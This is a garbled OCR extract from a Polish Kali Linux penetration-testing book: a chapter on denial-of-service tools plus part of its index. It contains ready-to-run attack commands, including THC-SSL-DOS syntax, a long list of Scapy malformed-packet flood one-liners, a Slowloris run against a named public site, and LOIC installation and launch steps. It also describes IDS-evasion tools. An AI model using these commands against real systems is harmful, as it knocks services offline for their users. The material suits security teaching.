THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
